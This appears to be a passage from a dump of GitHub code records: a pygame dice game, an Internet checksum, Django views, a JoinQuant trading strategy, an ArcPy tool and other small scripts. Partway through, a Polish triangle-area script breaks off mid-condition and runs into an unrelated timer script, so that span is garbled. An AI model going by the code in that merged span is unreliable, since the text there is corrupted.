크롤링 파일/가치더함/가치더함_230405_송현준.py","file_name":"가치더함_230405_송현준.py","file_ext":"py","file_size_in_byte":12801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36426614237","text":"import pygame\nimport random\nfrom sys import exit\nfrom operator import itemgetter\n\n\npygame.init()\n\n# Getting clock info\ncurrent_time = 0\ntime_when_pressed = 0\n\n# Defining the screen size\nWIDTH = 610\nHEIGHT = 600\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('dice-game')\n\nclock = pygame.time.Clock()\n\n# Loading the images for the die.\ndice_imgs = [\n    pygame.image.load('dice-game/Sprites/Dice-1.png').convert_alpha(),\n    pygame.image.load('dice-game/Sprites/Dice-2.png').convert_alpha(),\n    pygame.image.load('dice-game/Sprites/Dice-3.png').convert_alpha(),\n    pygame.image.load('dice-game/Sprites/Dice-4.png').convert_alpha(),\n    pygame.image.load('dice-game/Sprites/Dice-5.png').convert_alpha(),\n    pygame.image.load('dice-game/Sprites/Dice-6.png').convert_alpha()\n]\n\ndice_size = (64, 64)\n\ndice_surfs = [\n    pygame.transform.scale(dice_imgs[0], dice_size),\n    pygame.transform.scale(dice_imgs[1], dice_size),\n    pygame.transform.scale(dice_imgs[2], dice_size),\n    pygame.transform.scale(dice_imgs[3], dice_size),\n    pygame.transform.scale(dice_imgs[4], dice_size),\n    pygame.transform.scale(dice_imgs[5], dice_size)\n]\n\n# Creating the \"Play\" Button and Results Display\nbutton_img = pygame.image.load(\n    'dice-game/Sprites/unnpressed.png').convert_alpha()\nstart_img = pygame.transform.scale(button_img, (130, 85))\n\nbutton_font = pygame.font.Font('dice-game/font/Pixeltype.ttf', 50)\n\nclass Button():\n    def __init__(self, x, y, image):\n        self.image = image\n        self.rect = self.image.get_rect()\n        self.rect.center = (x, y)\n        self.clicked = False\n\n    def draw(self):\n        global play\n        # get mouse position\n        pos = pygame.mouse.get_pos()\n        action = False\n        if self.rect.collidepoint(pos):\n            if pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n                self.clicked = True\n                action = True\n\n        if pygame.mouse.get_pressed()[0] == 0:\n            self.clicked = False\n            action = False\n\n        # draw button on screen\n        screen.blit(self.image, (self.rect.x, self.rect.y))\n\n        return action\n    \n    \n    def reset(self):\n        global rand\n        rand = []\n        for c, i in enumerate(dice_rects):\n            rand.append(random.randint(0, 5))\n        play = True \n        run = False\n\n\n\n\n# create button instance\nstart_button = Button(300, 300, start_img)\nagain_button = Button(300, 300, start_img)\n\nfirst_surf = button_font.render('First Place!', False, 'Black')\nsecond_surf = button_font.render('Second Place', False, \"Black\")\nthird_surf = button_font.render('Third Place', False, 'Black')\nfourth_surf = button_font.render('Fourth Place...', False, 'Black')\nfifth_surf = button_font.render('   Tie!', False, 'Black')\n\n# Defining the coordinates for each dice in the list, appending each to the dice rectangles list through the loop.\ndice_rects = []\ndice_rects_coord = [\n    (250, 500), (350, 500), (500, 250), (500,\n                                         350), (100, 250), (100, 350), (250, 100), (350, 100)\n]\nfor i in range(len(dice_rects_coord)):\n    dice_rects.append(dice_surfs[1].get_rect(\n        center=dice_rects_coord[i]))\n\n# Randomizing the sprite for the dice.\nrand = []\nfor c, i in enumerate(dice_rects):\n    rand.append(random.randint(0, 5))\n\nplay = False\nrun = True\n# Start running the game.\nwhile run:\n    # Here we get all the player input from mouse and keyboard.\n    for event in pygame.event.get():\n        if event.type == 
pygame.QUIT:\n            pygame.quit()\n            exit()\n        if event.type == pygame.MOUSEBUTTONUP:\n            if start_button.rect.collidepoint(event.pos):\n                # Keeping track of actual time\n                if play == False:\n                    play = True\n\n    screen.fill((189, 255, 255))\n\n    if start_button.draw():\n        if play == False:\n            play = True\n            time_when_pressed = pygame.time.get_ticks()\n\n    positions = [first_surf, second_surf,\n                 third_surf, fourth_surf, fifth_surf]\n    players = {\n        (300, 560): rand[0] + rand[1] + 2,\n        (500, 410): rand[2] + rand[3] + 2,\n        (100, 410): rand[4] + rand[5] + 2,\n        (300, 160): rand[6] + rand[7] + 2,\n    }\n    # Bringing the surface (image) and rectangle (coordinate) to blit (display) the die once play_button has been pressed.\n    if play == True:\n\n        for id, dice in enumerate(dice_rects):\n            current_time = pygame.time.get_ticks()\n            tie = False\n            # If first loop, reset background\n            if id == 0:\n                screen.fill((189, 255, 255))\n\n            # Conditional statements staggering the dice reveal by the time elapsed since the button was pressed.\n            if id < 2:\n                screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n            elif id < 4:\n                if current_time - time_when_pressed >= 500:\n                    screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n            elif id < 6:\n                if current_time - time_when_pressed >= 1000:\n                    screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n            elif id < 8:\n                if current_time - time_when_pressed >= 1500:\n                    screen.blit(dice_surfs[rand[id]], (dice_rects[id]))\n\n            rank = sorted(players.items(), key=itemgetter(1), reverse=True)\n\n            if current_time - time_when_pressed >= 2000:\n                if rank[0][1] == rank[1][1]:\n                    tie = True\n                    for i, v in enumerate(rank):\n                        if i == 2:\n                            break\n                        screen.blit(\n                            positions[4], positions[i].get_rect(center=v[0]))\n                    positions = positions[2:]\n                    rank = rank[2:]\n\n                elif rank[0][1] == rank[2][1]:\n                    tie = True\n                    for i, v in enumerate(rank):\n                        if i == 3:\n                            break\n                        screen.blit(\n                            positions[4], positions[i].get_rect(center=v[0]))\n                    positions = positions[3:]\n                    rank = rank[3:]\n\n                for i, v in enumerate(rank):\n                    screen.blit(\n                        positions[i], positions[i].get_rect(center=v[0]))\n\n                if again_button.draw():\n                    play = False\n                    again_button.reset()\n    # Updating the screen and defining the framerate.\n    \n    pygame.display.update()\n    clock.tick(60)\n","repo_name":"paulo-desouza/python-minigames","sub_path":"dice-game/DiceGame.py","file_name":"DiceGame.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36178098588","text":"# RFC 1071 - Computing the Internet Checksum\ndef ip_checksum(data: bytes) -> int:\n    checksum = 0\n    for i in range(0, len(data), 2):\n        if i + 1 < len(data):\n            checksum += (data[i] << 8) + data[i + 1]\n        else:\n            checksum += data[i] << 8\n    # fold the carries back in until the sum fits in 16 bits\n    while checksum >> 16:\n        checksum = (checksum >> 16) + (checksum & 0xffff)\n    checksum = ~checksum & 0xffff\n    return checksum\n","repo_name":"kpbs5/netsec_assignment2","sub_path":"checksum1071.py","file_name":"checksum1071.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19290472269","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nClass for breaking strings into symbols\nand returning a list of each symbol.\n\"\"\"\nimport inspect\nfrom symbols import *\n\nL_USER = 'dear berry'\n\n# another lexing approach would be to identify blocks first; this is a side effect\nMATH_OPS = ['+', '-', '*', '/']\nBOOLS = [S.TRUE, S.FALSE]\nBOOL_OPS = [S.GREATER, S.LESS]\nEOS = [S.NL, S.EOF]\n\nclass GreenBerryLex():\n    def __init__(self):\n        print(self, 'does not have an 
initialiser')\n\n def lex(x, KWDs, add_eof=''):\n '''\n breaks string into symbols and ids\n returns list\n\n x - source string\n KWDs - keywords/symbols\n '''\n words = []\n cup = ''\n for i, elem in enumerate(x):\n if elem != ' ':\n cup += elem\n if i+1 >= len(x) or x[i+1] == ' ' or x[i+1] in KWDs or elem in KWDs:\n if cup != '':\n words.append(cup)\n cup = ''\n\n if add_eof == 1:\n words.append(S.EOF)\n\n return words\n","repo_name":"Rutujavd/greenBerry","sub_path":"greenberry/gb_utils/greenberry_lex.py","file_name":"greenberry_lex.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"23350465060","text":"import dualgrid as dg\nimport matplotlib.pyplot as plt\n\nbasis = dg.utils.icosahedral_basis()\n\nfilt_dist = 1.5\ncells = dg.dualgrid_method(basis, k_range=3)\n# Take a chunk of the crystal out of the middle\ncells = dg.utils.filter_cells(cells, filter=dg.utils.is_point_within_cube, filter_args=[filt_dist])\nG = dg.utils.graph_from_cells(cells) # Make graph\nprint(\"Generated graph.\")\n\n# Generate & save a mesh.\nprint(\"Saving mesh to ./graph_out.stl ...\")\ndg.utils.export_graph_to_stl(G, \"graph_out.stl\", 0.1)\n","repo_name":"joshcol9232/tiling","sub_path":"example_stl.py","file_name":"example_stl.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"72041328087","text":"from src.api.factory.exceptions.service_exceptions.db_service_exceptions.attendee_exceptions import \\\n InvalidMeetingPermissionException, InvalidCoordinatorException\nfrom src.api.factory.exceptions.service_exceptions.db_service_exceptions.meeting_exceptions import \\\n InvalidMeetingIdException\nfrom src.api.pool.services.attendee_services import AttendeeFormService, MeetingUser\nfrom src.database.postgres.user import User\nfrom .. 
import AttendeeAuthDecorator\n\n\nclass ChangeCoordinatorDecorator(AttendeeAuthDecorator):\n def update_model(self, *args, **kwargs) -> bool:\n \"\"\"\n Update is_coordinator fields on MeetingUser table\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n meeting_id = kwargs['meeting_id']\n coordinator_id = kwargs['coordinator_id']\n\n attendee_service = AttendeeFormService()\n current_coordinator = attendee_service.get_meeting_coordinator(meeting_id=meeting_id)\n\n # check valid meeting id\n if current_coordinator:\n if self.__check_valid_coordinator_permission(current_coordinator):\n # set current meeting coordinator to normal meeting attendee\n current_coordinator.is_coordinator = False\n if super().update_model(updated_model=current_coordinator):\n # update new coordinator\n new_coordinator = attendee_service.get_meeting_user(meeting_id=meeting_id,\n user_id=coordinator_id)\n # check valid new coordinator\n if self.__check_activated_coordinator(new_coordinator):\n new_coordinator.is_coordinator = True\n if super().update_model(updated_model=new_coordinator):\n self.commit()\n return True\n else:\n self.rollback()\n else:\n raise InvalidCoordinatorException()\n else:\n raise InvalidMeetingPermissionException()\n else:\n raise InvalidMeetingIdException()\n\n\n @staticmethod\n def __check_activated_coordinator(coordinator) -> bool:\n \"\"\"\n Check if coordinator had logged in before\n :param coordinator: A User model instance of Meeting coordinator\n :return: True if coordinator's is_activated field is True, otherwise, return False\n \"\"\"\n if isinstance(coordinator, MeetingUser):\n new_coordinator_user = coordinator.user\n if isinstance(new_coordinator_user, User):\n if new_coordinator_user.is_activated:\n return True\n return False\n\n def __check_valid_coordinator_permission(self, coordinator) -> bool:\n \"\"\"\n Check if self's auth_user is the coordinator of the meeting\n :param coordinator: A User model instance of Meeting coordinator\n :return: True if auth_user and coordinator is the same user, otherwise, return False\n \"\"\"\n if isinstance(coordinator, MeetingUser):\n auth_user = self.get_authenticated_user()\n coordinator_user = coordinator.user\n if isinstance(coordinator_user, User):\n if coordinator_user.id == auth_user.id:\n return True\n return False\n","repo_name":"enixdark/meeting-training-app","sub_path":"backend/src/api/pool/decorators/attendee_decorators/change_coordinator_decorator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11015200886","text":"class Solution:\n def evalRPN(self, tokens):\n \"\"\"\n :type tokens: List[str]\n :rtype: int\n \"\"\"\n if not tokens:\n return None\n stack_list = []\n while(tokens):\n t = tokens.pop(0)\n print(t)\n if t.lstrip('-').isdigit():\n # 注意isdigit不可以对负数用\n stack_list.append(int(t))\n else:\n print(stack_list)\n a1 = (stack_list.pop(-1))\n a2 = (stack_list.pop(-1))\n if t == \"+\":\n ans= a2 + a1\n elif t == \"-\":\n ans = a2 - a1\n elif t == \"*\":\n ans = a2 * a1\n else:\n ans = int(a2 / a1)\n\n stack_list.append((ans))\n return stack_list[0]\n\n\n\n\n\ntoken = [\"10\", \"6\", \"9\", \"3\", \"+\", \"-11\", \"*\", \"/\", \"*\", \"17\", \"+\", \"5\", \"+\"]\ns = 
Solution()\nprint(s.evalRPN(token))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"evalRPN.py","file_name":"evalRPN.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6924235441","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 14 13:53:07 2017\n\n@author: Eliza Wallace\n\nCount Overlap tool\nTool that counts the features that overlap each polygon in a feature class.\n\n\"\"\"\nimport arcpy\nimport sys\n\ncatchments = arcpy.GetParameterAsText(0)\nfeatures = arcpy.GetParameterAsText(1)\nfieldname = arcpy.GetParameterAsText(2)\nidfield = arcpy.GetParameterAsText(3)\n\n#fcdescr = arcpy.Describe(features)\n#shape = str(fcdescr.shapeType)\n\n# function that adds a suffix to a field name if it already exists\ndef AutoName(raster):\n raster = raster.replace(' ','') # removes spaces from layer name for ESRI GRID format\n checkraster = arcpy.Exists(raster) # checks to see if the raster already exists\n count = 2\n newname = raster\n\n while checkraster == True: # if the raster already exists, adds a suffix to the end and checks again\n newname = raster + str(count)\n count += 1\n checkraster = arcpy.Exists(newname)\n\n return newname\n\ntry: \n # spatial joins features to catchments \n sjoutput = AutoName(\"spatialjoin\")\n arcpy.SpatialJoin_analysis(catchments,features,sjoutput,\"JOIN_ONE_TO_MANY\",\"KEEP_COMMON\")\n\n # counts features joined to each catchment\n statsoutput = AutoName(\"statsoutput\")\n arcpy.Statistics_analysis(sjoutput, statsoutput,[[\"Join_Count\",\"SUM\"]], idfield)\n\n # adds the specified field name to the feature class\n arcpy.AddField_management(statsoutput, fieldname, \"SHORT\") \n \n # copies the count of features to the new field\n arcpy.CalculateField_management(statsoutput, fieldname,\"!SUM_Join_Count!\", \"PYTHON\")\n \n # joins the new field to the catchment feature class\n arcpy.JoinField_management(catchments,idfield,statsoutput,idfield,[fieldname])\n \nexcept Exception:\n e = sys.exc_info()[1]\n print(e.args[0])\n arcpy.AddError(e.args[0])\n \n \n \n ","repo_name":"eliza-wallace/ArcGIS_Tools","sub_path":"countoverlap.py","file_name":"countoverlap.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1715577764","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom core.models import Item, OrderItem, Order, BillingAddress, Coupon\nfrom django.views.generic import ListView, View, DetailView\nfrom django.utils import timezone\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom core.forms import CheckoutForm, CouponForm\n\n# Create your views here.\n\n\ndef products(request):\n context = {\n 'items': Item.objects.all()\n }\n return render(request, \"products.html\", context)\n\n\nclass CheckoutView(View):\n def get(self, *args, **kwargs):\n try:\n order = Order.objects.get(user=self.request.user, ordered=False)\n form = CheckoutForm()\n context = {'form': form, 'couponform': CouponForm(),\n 'order': order, 'DISPLAY_COUPON_FORM': False}\n return render(self.request, \"checkout.html\", context)\n except ObjectDoesNotExist:\n messages.info(self.request, \"Your cart is Empty\")\n return redirect(\"core:checkout\")\n\n def post(self, *args, **kwargs):\n form = 
CheckoutForm(self.request.POST or None)\n        try:\n            order = Order.objects.get(user=self.request.user, ordered=False)\n            if form.is_valid():\n                street_address = form.cleaned_data.get('street_address')\n                district = form.cleaned_data.get('district')\n                country = form.cleaned_data.get('country')\n                zip = form.cleaned_data.get('zip')\n                # same_shipping_address = form.cleaned_data.get(\n                #     'same_shipping_address')\n                # save_info = form.cleaned_data.get('save_info')\n                payment_option = form.cleaned_data.get('payment_option')\n                billing_address = BillingAddress(\n                    user=self.request.user,\n                    street_address=street_address,\n                    district=district,\n                    country=country,\n                    zip=zip,\n                )\n                billing_address.save()\n                order.billing_address = billing_address\n                order.save()\n                if payment_option == 'MM':\n                    return redirect('core:payment', payment_option='mobilemoney')\n                elif payment_option == 'COD':\n                    messages.success(\n                        self.request, \"Your Order is to be paid for when delivered\")\n                else:\n                    messages.warning(\n                        self.request, \"Invalid Payment Option Selected\")\n                    return redirect('core:checkout')\n\n        except ObjectDoesNotExist:\n            messages.warning(self.request, \"Your Shopping Cart is Empty\")\n            return redirect(\"core:order-summary\")\n\n\nclass PaymentView(View):\n    def get(self, *args, **kwargs):\n        order = Order.objects.get(user=self.request.user, ordered=False)\n        if order.billing_address:\n            context = {'order': order, 'DISPLAY_COUPON_FORM': False}\n            return render(self.request, 'payment.html', context)\n        else:\n            messages.warning(\n                self.request, \"You have not completed the checkout page\")\n            return redirect(\"core:checkout\")\n\n\nclass HomeView(ListView):\n    model = Item\n    paginate_by: int = 10\n    template_name = \"home.html\"\n\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n    def get(self, *args, **kwargs):\n        try:\n            order = Order.objects.get(user=self.request.user, ordered=False)\n            context = {'object': order}\n            return render(self.request, \"order_summary.html\", context)\n        except ObjectDoesNotExist:\n            messages.warning(self.request, \"Your Shopping Cart is Empty\")\n            return redirect(\"/\")\n\n\nclass ItemDetailView(DetailView):\n    model = Item\n    template_name = \"product.html\"\n\n\n@login_required\ndef add_to_cart(request, slug):\n    item = get_object_or_404(Item, slug=slug)\n    order_item, created = OrderItem.objects.get_or_create(\n        item=item, user=request.user, ordered=False)\n    order_qs = Order.objects.filter(user=request.user, ordered=False)\n    if order_qs.exists():\n        order = order_qs[0]\n        # check if the order item is in the order\n        if order.items.filter(item__slug=item.slug).exists():\n            order_item.quantity += 1\n            order_item.save()\n            messages.info(request, \"This item quantity was updated\")\n            return redirect(\"core:order-summary\")\n        else:\n            messages.info(request, \"This item was added to your cart\")\n            order.items.add(order_item)\n            return redirect(\"core:order-summary\")\n    else:\n        ordered_date = timezone.now()\n        order = Order.objects.create(\n            user=request.user, ordered_date=ordered_date)\n        order.items.add(order_item)\n        messages.info(request, \"This item was added to your cart\")\n        return redirect(\"core:order-summary\")\n\n\n@login_required\ndef remove_from_cart(request, slug):\n    item = get_object_or_404(Item, slug=slug)\n    order_qs = Order.objects.filter(user=request.user, ordered=False)\n    if order_qs.exists():\n        order = order_qs[0]\n        # check if the order item is in the order\n        if order.items.filter(item__slug=item.slug).exists():\n            order_item = OrderItem.objects.filter(\n                item=item, user=request.user, ordered=False)[0]\n            
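# detach the matched line item outright; per-unit decrements are handled by remove_single_item_from_cart below\n            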
order.items.remove(order_item)\n            messages.info(request, \"This item was removed from your cart\")\n            return redirect(\"core:order-summary\")\n        else:\n            # message\n            messages.info(request, \"Could not find Item\")\n            return redirect(\"core:product\", slug=slug)\n    else:\n        # message\n        messages.info(request, \"Your Cart is empty\")\n        return redirect(\"core:product\", slug=slug)\n\n\n@login_required\ndef remove_single_item_from_cart(request, slug):\n    item = get_object_or_404(Item, slug=slug)\n    order_qs = Order.objects.filter(user=request.user, ordered=False)\n    if order_qs.exists():\n        order = order_qs[0]\n        # check if the order item is in the order\n        if order.items.filter(item__slug=item.slug).exists():\n            order_item = OrderItem.objects.filter(\n                item=item, user=request.user, ordered=False)[0]\n            if order_item.quantity > 1:\n                order_item.quantity -= 1\n                order_item.save()\n            else:\n                order.items.remove(order_item)\n            messages.info(request, \"This item was updated\")\n            return redirect(\"core:order-summary\")\n        else:\n            # message\n            messages.info(request, \"Could not find Item\")\n            return redirect(\"core:product\", slug=slug)\n    else:\n        # message\n        messages.info(request, \"Your Cart is empty\")\n        return redirect(\"core:product\", slug=slug)\n\n\ndef get_coupon(request, code):\n    try:\n        coupon = Coupon.objects.get(code=code)\n        return coupon\n    except ObjectDoesNotExist:\n        messages.info(request, \"This coupon does not exist\")\n        return redirect(\"core:checkout\")\n\n\nclass AddCouponView(View):\n    def post(self, *args, **kwargs):\n        form = CouponForm(self.request.POST or None)\n        if form.is_valid():\n            try:\n                code = form.cleaned_data.get('code')\n                order = Order.objects.get(\n                    user=self.request.user, ordered=False)\n                order.coupon = get_coupon(self.request, code)\n                order.save()\n                messages.success(self.request, \"Successfully added coupon\")\n                return redirect('core:checkout')\n\n            except ObjectDoesNotExist:\n                messages.info(self.request, \"Your Cart is empty\")\n                return redirect(\"core:checkout\")\n","repo_name":"StuartKirunda/Django-Ecommerce","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25059677523","text":"import sys\nimport signal\nfrom random import random,choice\nfrom math import floor\nfrom time import sleep\nfrom subprocess import call\n\ndef cleanup():\n    call( [ \"/etc/init.d/rainbow\", \"restart\" ])\n\n# catch the interrupt signal\ndef trap_sigint( signal, frame ):\n    sys.stderr.write( \"Caught SIGINT, cleaning up and exiting.\\n\")\n    cleanup()\n    sys.exit(0)\n\n#signal.signal( signal.SIGINT, trap_sigint )\n\n\nusage = \"\"\"USAGE:\n    %s\n\"\"\" % sys.argv[0]\n\n# list of Turris leds\nleds = [ 'wan', 'lan1', 'lan2', 'lan3', 'lan4', 'lan5', 'wifi', 'pwr' ]\n\n# list of colors to cycle through\ncolors = [\n    \"00FF00\",\n    \"0000AA\",\n    \"FF6600\",\n    \"FF0000\",\n    \"009900\"\n    ]\n\nif ( len(sys.argv) < 1 ):\n    sys.stderr.write(usage)\n    exit(1)\n\ncall([ \"rainbow\", \"all\", \"disable\" ])\ncall([ \"rainbow\", \"all\", \"red\" ])\n\n\nfor idx, i in enumerate(leds):\n    ranval = random()\n    print(ranval)\n    if ranval >= 0.4:\n        #print(\"rainbow\", i, \"enable\")\n        call([\"rainbow\", i, \"enable\"])\n        sleep(1 + (0.3 * idx))\n    else:\n        #call([\"rainbow\", \"all\", \"disable\"])\n        for i in range(5):\n            call([\"rainbow\", \"all\", choice(colors)])\n            sleep(0.25)\n        call([\"rainbow\", \"all\", \"red\"])\n        sys.exit()\nfor i in range(25):\n    call([\"rainbow\", \"all\", choice(colors)])\n    
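# short pause so each random color flash is visible\n    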
sleep(0.15)\ncall([\"rainbow\", \"all\", \"disable\"])\n#cleanup()\n","repo_name":"filiptronicek/Turris","sub_path":"roulette.py","file_name":"roulette.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41830880645","text":"# Import the function library\nfrom jqdata import *\n\n# Moving-average windows\nMA_WIN_1 = 10\nMA_WIN_2 = 60\n\n\n# Set up the position management system.\n\n\n# Initialization: set the benchmark and options\ndef initialize(context):\n    set_benchmark('000300.XSHG')\n    set_option('use_real_price', True)\n    # log.set_level('order', 'error')\n\n    # Commission per stock trade: 0.03% on buys; 0.03% plus 0.1% stamp duty on sells; minimum commission 5 yuan per trade\n\n    # Scheduled functions\n    run_daily(before_market_open, time='before_open', reference_security='000300.XSHG')\n    run_daily(market_open, time='every_bar', reference_security='000300.XSHG')\n    # run_daily(after_market_close, time='after_close', reference_security='000300.XSHG')\n    # Stock pool - SSE 50\n    # g.stock_pool = get_index_stocks(\"000016.XSHG\", date=context.current_dt)\n    g.stock_pool = '510300.XSHG'\n    g.init_cash = context.portfolio.starting_cash # starting capital\n    g.down_cross_signaled = []\n\n\n# Runs before the open: build the signal sets\ndef before_market_open(context):\n    look_ahead_n = max(MA_WIN_1, MA_WIN_2) + 1\n    g.up_cross_signaled = set()\n    g.down_cross_signaled = set()\n\n    df = attribute_history(g.stock_pool, look_ahead_n, \"1d\", [\"close\"], skip_paused=True) # this call excludes the current day's data\n    if len(df) != look_ahead_n:\n        return\n    close = df[\"close\"]\n    ma_short = close.rolling(MA_WIN_1).mean() # short-term MA\n    ma_long = close.rolling(MA_WIN_2).mean() # long-term MA\n    uc_flags = (ma_short.shift(1) <= ma_long.shift(1)) & (ma_short > ma_long) # golden-cross flag\n    dc_flags = (ma_short.shift(1) >= ma_long.shift(1)) & (ma_short < ma_long) # dead-cross flag\n    # signal list\n    if uc_flags.iloc[-1]:\n        g.up_cross_signaled.add(g.stock_pool)\n    # if dc_flags.iloc[-1]:\n    #     g.down_cross_signaled.add(g.stock_pool)\n\n\n# Runs at the open: trading rules\ndef market_open(context):\n    cur_dt = context.current_dt.date() # current date\n    # p = context.portfolio # the cash account\n    current_data = get_current_data()\n    # open_price = current_data[code].day_open\n    each_cash = g.init_cash * 0.3 # cash allocated per position\n    each_cash1 = g.init_cash * 0.6\n\n    amount = context.portfolio.positions[g.stock_pool].total_amount\n    cost = context.portfolio.positions[g.stock_pool].avg_cost\n    p = get_current_data()[g.stock_pool].last_price\n\n    # buy names with a golden-cross signal / 1/3 of the capital each\n    for code in g.up_cross_signaled:\n        if current_data[code].paused:\n            continue\n        order_value(code, each_cash)\n\n    if amount > 0 and p >= cost * 1.1:\n        order_value(g.stock_pool, each_cash1) # add to the position\n    if amount > 0 and p >= cost * 1.25:\n        order_target(g.stock_pool, 0) # take profit, sell everything\n    if amount > 0 and p <= cost * 0.9:\n        order_target(g.stock_pool, 0) # stop loss, sell everything\n\n\n\n#\n# Runs after the close\n# def after_market_close(context):\n\n\n\n\n\n    # p = context.portfolio\n    # pos_level = p.positions_value / p.total_value\n    # record(pos_level=pos_level)\n","repo_name":"Sakura-BAI/meituan01","sub_path":"stock/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70092096728","text":"from enum import Enum\nfrom typing import List, Optional, Tuple\n\nimport torch\nfrom basic_nn import BasicNet\n\nfrom spock import SpockBuilder\nfrom spock import spock\n\n\nclass Activation(Enum):\n    relu = \"relu\"\n    gelu = \"gelu\"\n    tanh = \"tanh\"\n\n\nclass Optimizer(Enum):\n    sgd = \"SGD\"\n    adam = \"Adam\"\n\n\n@spock\nclass ModelConfig:\n    n_features: int\n    dropout: Optional[List[float]]\n    hidden_sizes: 
Tuple[int, int, int] = (32, 32, 32)\n    activation: Activation = \"relu\"\n    optimizer: Optimizer\n    cache_path: Optional[str]\n\n\n@spock\nclass DataConfig:\n    batch_size: int = 2\n    n_samples: int = 8\n    cache_path: Optional[str]\n\n\n@spock\nclass OptimizerConfig:\n    lr: float = 0.01\n    n_epochs: int = 2\n    grad_clip: Optional[float]\n\n\n@spock\nclass SGDConfig(OptimizerConfig):\n    weight_decay: float\n    momentum: float\n    nesterov: bool\n\n\ndef train(x_data, y_data, model, model_config, data_config, optimizer_config):\n    if model_config.optimizer == \"SGD\":\n        optimizer = torch.optim.SGD(\n            model.parameters(),\n            lr=optimizer_config.lr,\n            momentum=optimizer_config.momentum,\n            nesterov=optimizer_config.nesterov,\n        )\n    elif model_config.optimizer == \"Adam\":\n        optimizer = torch.optim.Adam(model.parameters(), lr=optimizer_config.lr)\n    else:\n        raise ValueError(f\"Optimizer choice {optimizer_config.optimizer} not available\")\n    n_steps_per_epoch = data_config.n_samples // data_config.batch_size\n    for epoch in range(optimizer_config.n_epochs):\n        for i in range(n_steps_per_epoch):\n            # Simple mini-batch slicing over the sample axis\n            x_batch = x_data[\n                i * data_config.batch_size : (i + 1) * data_config.batch_size,\n            ]\n            y_batch = y_data[\n                i * data_config.batch_size : (i + 1) * data_config.batch_size,\n            ]\n            optimizer.zero_grad()\n            output = model(x_batch)\n            loss = torch.nn.functional.cross_entropy(output, y_batch)\n            loss.backward()\n            if optimizer_config.grad_clip:\n                torch.nn.utils.clip_grad_value_(\n                    model.parameters(), optimizer_config.grad_clip\n                )\n            optimizer.step()\n        print(f\"Finished Epoch {epoch+1}\")\n\n\ndef main():\n    # A simple description\n    description = \"spock Advanced Tutorial\"\n    # Build out the parser by passing in Spock config objects as *args after description\n    config = SpockBuilder(\n        ModelConfig, DataConfig, SGDConfig, desc=description\n    ).generate()\n    # Instantiate our neural net using the generated config\n    basic_nn = BasicNet(model_config=config.ModelConfig)\n    # Make some random data (BxH): H has dim of features in\n    x_data = torch.rand(config.DataConfig.n_samples, config.ModelConfig.n_features)\n    y_data = torch.randint(0, 3, (config.DataConfig.n_samples,))\n    # Run some training\n    train(\n        x_data,\n        y_data,\n        basic_nn,\n        config.ModelConfig,\n        config.DataConfig,\n        config.SGDConfig,\n    )\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"fidelity/spock","sub_path":"examples/tutorial/advanced/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"31"} +{"seq_id":"34094701658","text":"import math\na = input(\"enter the first side a= \")\nb = input(\"enter the second side b= \")\nc = input(\"enter the third side c= \")\n\ndef poleTrojkata(a,b,c):\n    if a.isnumeric() and b.isnumeric() and c.isnumeric():\n        a = int(a)\n        b = int(b)\n        c = int(c)\n        if a <=0 or b <=0 or c <=0:\n            print(\"invalid side length\")\n            return -1\n        if a c:\r\n            options[a]()\r\n            newTime_break = True\r\n\r\n\r\ndef randomizer(timer_breaks, ibreaks):\r\n    global newTime_break\r\n    global timer_break\r\n    global ibreak\r\n    random_break(timer_breaks, ibreaks)\r\n    if newTime_break == True:\r\n        timer_break = timer()\r\n        ibreak = random.randrange(600, 2000)\r\n        newTime_break = False\r\n\r\n    # b = random.uniform(4, 5)\r\n\r\n\r\ndef timer():\r\n    startTime = time.time()\r\n    return startTime\r\n\r\n\r\ndef random_pause():\r\n    global newTime_break\r\n    b = random.uniform(20, 250)\r\n    print('pausing for ' + str(b) + ' seconds')\r\n    time.sleep(b)\r\n    newTime_break = 
